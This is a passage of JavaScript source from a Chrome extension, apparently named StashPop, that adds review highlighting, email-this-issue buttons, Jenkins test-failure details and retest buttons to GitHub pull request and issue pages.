(comment.classList.contains("timeline-new-content")) { continue; } // TODO: exclude "email-hidden-reply", example https://github.com/mono/mono/pull/2420 var body = comment.children[1].getElementsByClassName("js-comment-body")[0]; if (typeof body !== "undefined") { var bodyHtml = body.innerHTML; if (positiveIndicatorsString.length > 0) { for (var c = 0; c < positiveIndicators.length; c++) { if (bodyHtml.indexOf(positiveIndicators[c]) >= 0) { positiveReviews.push(comment); break; } } } if (negativeIndicatorsString.length > 0) { for (var c = 0; c < negativeIndicators.length; c++) { if (bodyHtml.indexOf(negativeIndicators[c]) >= 0) { negativeReviews.push(comment); break; } } } if (testedIndicatorsString.length > 0) { for (var c = 0; c < testedIndicators.length; c++) { if (bodyHtml.indexOf(testedIndicators[c]) >= 0) { testReviews.push(comment); break; } } } } } if (positiveReviews.length > 0 || negativeReviews.length > 0 || testReviews.length > 0) { var reviewsContainer = document.createElement("div"); reviewsContainer.setAttribute("class", stashPopClassName); if (positiveReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77", "#edffed", "#00cc00"); } if (negativeReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777", "#ffedf6", "#cc0000"); } if (testReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff", "#dff6ff", "#0000cc"); } var discussion = document.getElementsByClassName("js-discussion")[0]; discussion.insertBefore(reviewsContainer, discussion.firstChild); } } function getBestCodeReviewOptions(codeReviewOptions) { var codeReviewOptionsEntries = codeReviewOptions.trim().match((/[^\r\n]+/g)); log("Calculating best matching code review options"); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; for (var i = 0; i < codeReviewOptionsEntries.length; i++) { log(" Considering " + codeReviewOptionsEntries[i].trim()); var rerunEntryParts = codeReviewOptionsEntries[i].trim().split(";"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var bestMatch = codeReviewOptionsEntries[i].trim(); log(" Setting new best match to: " + bestMatch); } } log("Best-match code review options: " + bestMatch); return bestMatch; } function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, contributorBackgroundColor, externalBackgroundColor, contributorAggregationBackground) { var titleDiv = document.createElement("div"); var titleText = document.createElement("b"); titleText.textContent = title + ": "; titleDiv.appendChild(titleText); titleDiv.style.cssFloat = "left"; titleDiv.style.display = "block"; reviewsContainer.appendChild(titleDiv); var reviewListDiv = document.createElement("div"); reviewListDiv.style.cssFloat = "left"; reviewListDiv.style.display = "block"; var commentsFromContributors = new Array(); var commentsFromNonContributors = new Array(); for (var i = 0; i < reviews.length; i++) { var review = reviews[i]; var header = review.getElementsByClassName("timeline-comment-header-text")[0]; var username = header.getElementsByTagName("strong")[0].innerText; var label = review.getElementsByClassName("timeline-comment-label")[0]; var labelPart = ""; if (typeof label !== "undefined") { var reviewerKind = label.innerText; labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; } var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; headerForBackground.style.backgroundColor = (labelPart == "" ? externalBackgroundColor : contributorBackgroundColor); var time = review.getElementsByTagName("time")[0].innerText; var imgTag = review.children[0].children[0].cloneNode(); imgTag.className = "avatar"; imgTag.height = 35; imgTag.width = 35; imgTag.style.backgroundColor = (labelPart == "" ? "#C8C8C8" : contributorAggregationBackground); imgTag.style.padding = "3px"; var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); imgTag.role = "button"; imgTag.style.cursor = "pointer"; imgTag.style.margin = "0px 0px 3px 3px"; var clickLocation = "#" + header.getElementsByClassName("timestamp")[0].href.split("#")[1]; (function (newLocation) { imgTag.onclick = function () { // todo: navigation doesn't work if location.hash == newLocation location.hash = newLocation; }; })(clickLocation); if (labelPart == "") { commentsFromNonContributors.push(imgTag); } else { commentsFromContributors.push(imgTag); } } var allComments = commentsFromContributors.concat(commentsFromNonContributors); for (var i = 0; i < allComments.length; i++) { reviewListDiv.appendChild(allComments[i]); if (i % 10 == 9) { reviewListDiv.appendChild(document.createElement("br")); } } reviewsContainer.appendChild(reviewListDiv); var clearDiv = document.createElement("div"); clearDiv.style.clear = "both"; reviewsContainer.appendChild(clearDiv); } function sendmultimail(issuesList, isPull) { var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var body = ""; var shortBody = ""; var count = 0; var singleIssueNumber = ""; var singleIssueTitle = ""; for (var i = 0; i < issuesList.children.length; i++) { if (issuesList.children[i].classList.contains("selected")) { count++; var issue = issuesList.children[i]; var title = issue.getElementsByClassName("issue-title")[0]; var urlParts = title.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1].trim(); var issueTitle = title.getElementsByClassName("issue-title-link")[0].innerHTML.trim(); singleIssueNumber = issueNumber; singleIssueTitle = issueTitle; // TODO: Fetch the target branch of each PR. body = body + issueTitle + " " + baseUrl + issueNumber + "\r\n"; shortBody = shortBody + "#" + issueNumber + ": " + issueTitle + "\r\n"; } } if (count == 1) { sendmail(singleIssueNumber, singleIssueTitle, isPull); return; } var subject = owner + "/" + repo + ": " + count + " Selected " + (isPull ? "PRs" : "Issues"); body = body + "\r\n\r\n"; // TODO: Assigned to, etc. shortBody = shortBody + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." shortBody = shortBody + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); var decodedShortBody = $('<div/>').html(shortBody).text(); var finalFullMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); var finalShortMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedShortBody); if (finalFullMailToUrl.length <= 2083) { window.location.href = finalFullMailToUrl; } else if (finalShortMailToUrl.length <= 2083) { window.location.href = finalShortMailToUrl; window.alert("issue links omitted to fit within the maximum mailto url length"); } else { window.alert("mailto maximum url length exceeded, choose fewer items"); } } function sendmail(issueNumber, issueTitle, isPull) { issueTitle = issueTitle.trim(); issueNumber = issueNumber.trim(); var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; var kind = isPull ? "PR" : "Issue"; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var targetBranchDisplay = ""; if (isPull) { if (isListPage) { // The PR list page contains no information about target branch, so we have to go look it up. var url = "https://github.com/" + currentPageOrg + "/" + currentPageRepo + "/pull/" + issueNumber; chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var fullTargetBranchSpec = doc.getElementsByClassName("current-branch")[0].innerText; log("PR target branch (from individual PR page): " + fullTargetBranchSpec); finishIt(fullTargetBranchSpec); }); } else { var targetFullBranchSpecParts = $(".current-branch").first().text().split(":"); var targetBranch = targetFullBranchSpecParts.length == 1 ? targetFullBranchSpecParts[0] : targetFullBranchSpecParts[1]; log("PR target branch: " + targetBranch); if (targetBranch != "master" && targetBranch != "") { targetBranchDisplay = "/" + targetBranch; log("PR target branch display: " + targetBranchDisplay); } } } var subject = owner + "/" + repo + targetBranchDisplay + " " + kind + " #" + issueNumber + ": " + issueTitle; var body = baseUrl + issueNumber + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); window.location.href = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); }
content.js
// Constants var stashPopClassName = "stashPop"; var jenkinsReloadableInfoClassName = "jenkinsReloadableInfo"; // This list must match the list specified in reload() var option_emailIssuesList = "emailIssuesList"; var option_emailIssue = "emailIssue"; var option_emailPullRequestList = "emailPullRequestList"; var option_emailPullRequest = "emailPullRequest"; var option_jenkinsOpenDetailsLinksInNewTab = "jenkinsOpenDetailsLinksInNewTab"; var option_jenkinsShowRunTime = "jenkinsShowRunTime"; var option_jenkinsShowFailureIndications = "jenkinsShowFailureIndications"; var option_jenkinsShowTestFailures = "jenkinsShowTestFailures"; var option_jenkinsShowBugFilingButton = "jenkinsShowBugFilingButton"; var option_jenkinsShowRetestButton = "jenkinsShowRetestButton"; var option_jenkinsOfferInlineFailuresOnPRList = "jenkinsOfferInlineFailuresOnPRList"; var option_issueCreationRouting = "issueCreationRouting"; var option_nonDefaultTestInfo = "nonDefaultTestInfo"; var option_defaultIssueLabels = "defaultIssueLabels"; var option_testRerunText = "testRerunText"; var option_showCodeReviewInfo = "showCodeReviewInfo"; var option_codeReviewOptions = "codeReviewOptions"; document.addEventListener("DOMContentLoaded", function () { "use strict"; log("DOMContentLoaded"); try { initialSetup(); reload(true); } catch (err) { logfailure(err); } }); function initialSetup() { log("Performing initial setup"); configureTooltips(); var s = document.createElement('script'); s.src = chrome.extension.getURL('scripts/injectedcode.js'); s.onload = function () { this.parentNode.removeChild(this); }; (document.head || document.documentElement).appendChild(s); document.addEventListener('_pjax:end', function () { log("Detected page data changed."); reload(false); }, false); } function configureTooltips() { log("Configuring tooltips"); $(document).tooltip({ items: "[stashpop-title]", track: false, close: function (evt, ui) { $(document).data("ui-tooltip").liveRegion.children().remove(); }, position: { my: "left+5 top+5", at: "left bottom" }, tooltipClass: "ui-tooltip", show: "slideDown", hide: false, content: function () { var element = $(this); if (element.is("[stashpop-title]")) { var text = element.attr("stashpop-title"); return text; // "<b>What up?</b> Yo?"; } } }); } function reload(firstRun) { resetGlobals(); log("Remove all StashPop elements and reload data"); $('.' + stashPopClassName).remove(); chrome.runtime.sendMessage({ method: "getSettings", keys: [ option_emailIssuesList, option_emailIssue, option_emailPullRequestList, option_emailPullRequest, option_jenkinsOpenDetailsLinksInNewTab, option_jenkinsShowRunTime, option_jenkinsShowFailureIndications, option_jenkinsShowTestFailures, option_jenkinsShowBugFilingButton, option_jenkinsShowRetestButton, option_jenkinsOfferInlineFailuresOnPRList, option_issueCreationRouting, option_nonDefaultTestInfo, option_defaultIssueLabels, option_testRerunText, option_showCodeReviewInfo, option_codeReviewOptions ] }, function (currentSettings) { if (isIndividualItemPage) { var title = document.getElementsByClassName("js-issue-title")[0].innerHTML; var number = document.getElementsByClassName("gh-header-number")[0].innerHTML.substring(1); // https://github.com/dotnet/roslyn/pull/5786 var isPull = postDomainUrlParts[2] == "pull"; if (isPull && currentSettings[option_showCodeReviewInfo]) { var bestCodeReviewOptions = getBestCodeReviewOptions(currentSettings[option_codeReviewOptions]); observeCommentFieldChanges(bestCodeReviewOptions); addCodeReviewSummaryAndButtons(bestCodeReviewOptions); } addButtonsToIndividualItemPage(title, number, isPull, currentSettings); makeBuildStatusWindowsBig(); if (currentSettings[option_jenkinsOpenDetailsLinksInNewTab]) { openJenkinsDetailsInNewTab(currentSettings); } } if (isListPage) { // https://github.com/dotnet/roslyn/pulls/dpoeschl // https://github.com/pulls var isPull = postDomainUrlParts[2] == "pulls" || (currentPageOrg == null && postDomainUrlParts[0] == "pulls"); addButtonsToListPage(isPull, currentSettings); } reloadJenkins(firstRun, currentSettings); } ); } function observeCommentFieldChanges(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); var target = document.querySelector('#new_comment_field'); var observer = new MutationObserver(function (mutations) { mutations.forEach(function (mutation) { var text = target.value; for (var c = 0; c < positiveIndicators.length; c++) { if (text.indexOf(positiveIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ff77"; }); return; } } for (var c = 0; c < negativeIndicators.length; c++) { if (text.indexOf(negativeIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#ff7777"; }); return; } } for (var c = 0; c < testedIndicators.length; c++) { if (text.indexOf(testedIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ccff"; }); return; } } // Default background color $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#f7f7f7"; }); }); }); var config = { attributes: true, childList: true, characterData: true }; observer.observe(target, config); } function reloadJenkins(firstRun, currentSettings) { if (!firstRun) { log("Deleting inlined Jenkins data"); $('.' + jenkinsReloadableInfoClassName).remove(); } addTestFailureButtonsAndDescriptions(currentSettings); if (currentSettings[option_jenkinsShowRunTime]) { addJenkinsTestRunTimes(); } if (currentSettings[option_jenkinsShowRunTime] || currentSettings[option_jenkinsShowFailureIndications] || currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton]) { addJenkinsRefreshButton(currentSettings); } } // Globals var currentPageFullUrl; var postDomainUrlParts; var currentPageOrg; var currentPageRepo; var isIndividualItemPage; var individualItemPageTitleElement; var isListPage; var itemListElement; function resetGlobals() { log("Resetting globals"); log("Clearing old globals"); currentPageFullUrl = null; postDomainUrlParts = null; currentPageOrg = null; currentPageRepo = null; isIndividualItemPage = null; individualItemPageTitleElement = null; isListPage = null; itemListElement = null; log("Setting new globals"); currentPageFullUrl = window.location.href; log("currentPageFullUrl: " + currentPageFullUrl); var urlParts = normalizeAndRemoveUrlParameters(currentPageFullUrl).split("/"); var indexOfGitHubDotCom = -1; for (var i = 0; i < urlParts.length; i++) { if (urlParts[i].indexOf("github.com") > -1) { indexOfGitHubDotCom = i; break; } } if (indexOfGitHubDotCom > -1) { postDomainUrlParts = urlParts.slice(indexOfGitHubDotCom + 1, urlParts.length); log("postDomainUrlParts: " + postDomainUrlParts.toString()); var org = urlParts[indexOfGitHubDotCom + 1]; var repo = urlParts[indexOfGitHubDotCom + 2]; log("ASDF" + repo); if (typeof org !== "undefined") { if (org == "pulls") { // Personal pulls page: github.com/pulls... // Handled below, but don't treat "pulls" as the organization } else { // Organization sub-page: github.com/dotnet... currentPageOrg = org; } } log("currentPageOrg: " + currentPageOrg); if (typeof repo !== "undefined") { // Repository sub-page: github.com/dotnet/roslyn... currentPageRepo = repo; } log("currentPageRepo: " + currentPageRepo); individualItemPageTitleElement = document.getElementsByClassName("js-issue-title")[0]; isIndividualItemPage = typeof individualItemPageTitleElement !== 'undefined'; log("isIndividualItemPage: " + isIndividualItemPage); itemListElement = document.getElementsByClassName("table-list-issues")[0]; isListPage = typeof itemListElement !== 'undefined'; log("isListPage: " + isListPage); } } function logfailure(err) { log("ERROR - " + err); log("ERROR STACK - " + err.stack); } function log(message) { console.log("StashPop: " + message); } function addButtonsToIndividualItemPage(title, number, isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequest]) || (!isPull && currentSettings[option_emailIssue])) { var buttonsContainer = document.createElement("div"); buttonsContainer.setAttribute("class", stashPopClassName); var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(number, title, isPull); }); buttonsContainer.appendChild(emailButton); if (!isPull) { var workItemButton = createButtonWithCallBack( "Copy as WorkItem Attribute", function () { log("Copy as WorkItem Attribute clicked"); copyTextToClipboard('<WorkItem(' + number + ', "' + window.location.href + '")>'); }); workItemButton.style.margin = "0px 0px 0px 4px"; buttonsContainer.appendChild(workItemButton); } individualItemPageTitleElement.parentNode.appendChild(buttonsContainer); } } function addButtonsToListPage(isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequestList]) || (!isPull && currentSettings[option_emailIssuesList])) { var numberOfCheckedItemsElement = document.getElementsByClassName("js-check-all-count")[0]; if (typeof numberOfCheckedItemsElement !== "undefined") { var buttonAll = createButtonWithCallBack( "Email Selected " + (isPull ? "PRs" : "Issues"), function () { log("Email Selected Items clicked"); sendmultimail(itemListElement, isPull); }); buttonAll.className = "btn btn-sm"; numberOfCheckedItemsElement.parentNode.insertBefore(buttonAll, numberOfCheckedItemsElement.parentNode.firstChild); } for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var urlParts = titleElement.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1]; var issueTitle = titleElement.getElementsByClassName("issue-title-link")[0].innerHTML; (function () { var _issueNumber = issueNumber; var _issueTitle = issueTitle; var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(_issueNumber, _issueTitle, isPull); }); emailButton.className = "btn btn-sm " + stashPopClassName; titleElement.insertBefore(emailButton, titleElement.firstChild); })(); } } if (isPull && currentSettings[option_jenkinsOfferInlineFailuresOnPRList]) { log("Handling failures in PR list"); var failureTitles = new Array(); var failureClassNames = new Array(); var failureIndices = new Array(); for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; if (typeof itemElement.getElementsByClassName("octicon-x")[0] !== "undefined") { // PR with failures log("Found a failure"); var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var pullRequestElement = itemElement.getElementsByClassName("issue-title")[0]; // On github.com/pulls there are two "issue-title-link" elements. The first is for the repo, the second for the issue. // Get the issue number, then add the repo qualifier if necessary. var pullRequestUrlParts = pullRequestElement.getElementsByClassName("issue-title-link js-navigation-open")[0].href.split("/"); log("PR Request Parts: " + pullRequestUrlParts.toString()); var pullRequestNumber = pullRequestUrlParts[pullRequestUrlParts.length - 1]; log("In PR #" + pullRequestNumber); var pullRequestRepo = ""; if (currentPageOrg == null) { var prOrg = pullRequestUrlParts[pullRequestUrlParts.length - 4]; var prRepo = pullRequestUrlParts[pullRequestUrlParts.length - 3]; pullRequestRepo = prOrg + "_ClassNameFriendlySeparator_" + prRepo; log("In Repo: " + pullRequestRepo); } var pullRequestIdentifier = pullRequestRepo + pullRequestNumber; log("Failure identifier: " + pullRequestIdentifier); var showJenkinsFailureLink = document.createElement("a"); showJenkinsFailureLink.href = "#"; var className = "loadjenkinsfailure" + pullRequestIdentifier; showJenkinsFailureLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " " + className; showJenkinsFailureLink.text = "Show Jenkins failure"; showJenkinsFailureLink.style.color = 'red'; log("titleElement:" + titleElement); log("showJenkinsFailureLink:" + showJenkinsFailureLink); titleElement.appendChild(showJenkinsFailureLink); failureTitles.push(titleElement); failureClassNames.push(className); failureIndices.push(i); (function () { var _titleElement = titleElement; var _className = className; var _i = i; log("Hooking up click event for class " + _className); $('.' + _className).click(function (e) { e.preventDefault(); log("Click - Load Jenkins Failure for #" + _className.substring("loadjenkinsfailure".length)); inlineFailureInfoToPRList(_titleElement, _className, _i, currentSettings); }); })(); } } if (failureTitles.length >= 1) { var headerStates = document.getElementsByClassName("table-list-header-toggle states")[0]; var loadAllFailuresLink = document.createElement("a"); loadAllFailuresLink.href = "#"; loadAllFailuresLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " loadalljenkinsfailures"; loadAllFailuresLink.text = "Show all Jenkins failures"; loadAllFailuresLink.style.color = 'red'; headerStates.appendChild(loadAllFailuresLink); $('.loadalljenkinsfailures').click(function (e) { log("Click - Load All Jenkins Failures") e.preventDefault(); for (var i = 0; i < failureTitles.length; i++) { inlineFailureInfoToPRList(failureTitles[i], failureClassNames[i], failureIndices[i], currentSettings); } }); } } } function createCommentSettingLink(title, comment, color) { return createLinkWithCallBack( title, function () { var commentText = comment + "\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); return false; }, color); } function createLinkWithCallBack(title, callback, color) { color = color || "#4078c0"; var a = document.createElement("a"); a.text = title; a.role = "button"; a.href = ""; a.style.marginRight = "5px"; a.style.color = color; a.onclick = callback; return a; } function createRequestJenkinsAccessLinkWithCallbackIfAllowed(url, callback) { return createLinkWithCallBack( "Grant StashPop access", function () { log("Allow/request access button clicked for " + url + ". Sending request..."); executeCallbackIfUrlAccessGranted(url, callback); return false; }); } function executeCallbackIfUrlAccessGranted(url, callback) { log("Requesting access for " + url + "..."); chrome.runtime.sendMessage({ method: "requestOriginAccess", keys: [url] }, function (response) { if (response) { log(" Access granted. Executing callback."); callback(); } else { log(" Access denied."); } }); } function createButtonWithCallBack(title, callback) { var button = document.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", title); button.onclick = callback; return button; } // Copy provided text to the clipboard. function copyTextToClipboard(text) { var copyFrom = $('<textarea/>'); copyFrom.text(text); $('body').append(copyFrom); copyFrom.select(); document.execCommand('copy'); copyFrom.remove(); } // TODO: Only scrape once between this and addTestFailureButtonsAndDescriptions function addJenkinsTestRunTimes() { var testRuns = document.getElementsByClassName("build-status-item"); for (var i = 0; i < testRuns.length; i++) { var run = testRuns[i]; var detailsLink = run.getElementsByClassName("build-status-details")[0]; if (typeof detailsLink === 'undefined') { continue; } var textToUpdate = run.getElementsByClassName("text-muted")[0]; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassName = stashPopClassName + "_TestRunTime_" + i; loading.className = stashPopClassName + " " + specificClassName; textToUpdate.appendChild(loading); (function (_run, _url, _specificClassName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var header = doc.getElementsByClassName("build-caption page-headline")[0]; if (typeof header === "undefined") { $('.' + _specificClassName).remove(); return; } var timestamp = header.innerText.split("(")[1].split(")")[0]; var timestampMoment = moment(timestamp); var dayCount = moment().diff(timestampMoment, 'days', true); var backgroundColor = "#000000"; if (dayCount <= 2) { backgroundColor = "#AAFFAA"; } // green else if (dayCount <= 5) { backgroundColor = "#FFC85A"; } // yellow else { backgroundColor = "#FFAAAA"; } // red $('.' + _specificClassName).remove(); var textToUpdate = _run.getElementsByClassName("text-muted")[0]; var span = document.createElement("span"); span.innerHTML = "(" + timestampMoment.fromNow() + ")"; span.style.backgroundColor = backgroundColor; span.setAttribute("title", timestamp + "\n\nGreen: < 2 days\nYellow: 2 to 5 days\nRed: > 5 days"); span.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; textToUpdate.appendChild(span); }); })(run, detailsLink.href, specificClassName); } } function addTestFailureButtonsAndDescriptions(currentSettings) { if (currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton] || currentSettings[option_jenkinsShowFailureIndications]) { processTestFailures( document, null, 0, currentSettings["jenkinsShowBugFilingButton"], currentSettings["jenkinsShowFailureIndications"], currentSettings["jenkinsShowTestFailures"], currentSettings["jenkinsShowRetestButton"], function (x, y, z, w) { }, currentSettings); } } function processTestFailures(doc, prLoadingDiv, rowNumber, jenkinsShowBugFilingButton, jenkinsShowFailureIndications, jenkinsShowTestFailures, jenkinsShowRetestButton, callbackWhenTestProcessed, currentSettings) { var testFailures = doc.getElementsByClassName("octicon-x build-status-icon"); if (typeof prLoadingDiv !== "undefined" && prLoadingDiv !== null) { // Delete the existing loading icon while (prLoadingDiv.firstChild) { prLoadingDiv.removeChild(prLoadingDiv.firstChild); } // Drop in a bunch of new loading icons for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var div = document.createElement("div"); var specificClassName = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; div.className = stashPopClassName + " " + specificClassName; div.style.color = "#000000"; var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var testFailure = testFailures[i]; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var t = document.createTextNode("Processing failed queue '" + queueName + "'..."); div.appendChild(loading); div.appendChild(t); prLoadingDiv.appendChild(div); } } if (!isListPage) { var nonDefaultTestInfo = currentSettings[option_nonDefaultTestInfo]; var nonDefaultTests = nonDefaultTestInfo.trim().match(/[^\r\n]+/g); var relevantNonDefaultTests = new Array(); log("Calculating relevant non-default test suites...") for (var i = 0; i < nonDefaultTests.length; i++) { log(" Considering: " + nonDefaultTests[i]) var specParts = nonDefaultTests[i].trim().split(":"); if (specParts.length == 2 || specParts.length == 3) { var scope = specParts[0].trim(); var testToRun = specParts[1].trim(); var runIfNotAlreadyRun = specParts.length == 3 ? specParts[2].trim() : testToRun; var scopeParts = scope.trim().split("/"); if (scopeParts.length == 1 || scopeParts.length == 2) { var orgToMatch = scopeParts[0].trim(); if (orgToMatch == currentPageOrg) { var repoToMatch = scopeParts.length == 2 ? scopeParts[1].trim() : ""; if (scopeParts.length == 1 || repoToMatch == currentPageRepo) { log(" It matches, adding mapping from " + runIfNotAlreadyRun + " to " + testToRun); relevantNonDefaultTests[runIfNotAlreadyRun] = testToRun; } } } } } var nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("relevantNonDefaultTests length: " + nonDefaultTestCount); log("Removing already-run tests...") var buildStatusList = $(".build-statuses-list:visible")[0]; if (typeof buildStatusList !== "undefined") { for (var i = 0; i < buildStatusList.children.length; i++) { var individualStatus = buildStatusList.children[i]; var queueName = individualStatus.getElementsByTagName("strong")[0].innerText.trim(); log(" Trying to delete: " + queueName); delete relevantNonDefaultTests[queueName]; } nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("Updated relevantNonDefaultTests length: " + nonDefaultTestCount); if (nonDefaultTestCount > 0) { var additionalJobsDiv = doc.createElement("div"); additionalJobsDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var t = document.createTextNode("Run non-default tests: "); additionalJobsDiv.appendChild(t); for (var key in relevantNonDefaultTests) { var value = relevantNonDefaultTests[key]; (function () { var jobName = value; var jobButton = createButtonWithCallBack( jobName, function () { var commentText = "retest " + jobName + " please\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }); jobButton.className = "btn btn-sm"; additionalJobsDiv.appendChild(jobButton); })(); } buildStatusList.previousSibling.previousSibling.appendChild(additionalJobsDiv); } } } for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var testFailure = testFailures[i]; var testFailUrl = testFailure.parentNode.getElementsByClassName("build-status-details")[0].href; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassNameForJenkinsFailureRedAreaLoader = stashPopClassName + "_TestFailures_" + i; loading.className = stashPopClassName + " " + specificClassNameForJenkinsFailureRedAreaLoader; testFailure.parentNode.insertBefore(loading, testFailure.parentNode.firstChild); var specificClassNameForPRListFailure = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; (function (_testFailure, _testFailUrl, _specificClassNameForPRListFailure, _specificClassNameForJenkinsFailureRedAreaLoader, _queueName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _testFailUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var h2elements = doc.getElementsByTagName("h2"); var aelements = doc.getElementsByTagName("a"); var url = window.location.href; var urlParts = url.split("/"); var pullNumber = urlParts[urlParts.length - 1]; var pullTitle = ""; if (typeof document.getElementsByClassName("js-issue-title")[0] !== "undefined") { pullTitle = document.getElementsByClassName("js-issue-title")[0].innerText.trim(); } var pullAuthor = ""; if (typeof document.getElementsByClassName("pull-header-username")[0] !== "undefined") { pullAuthor 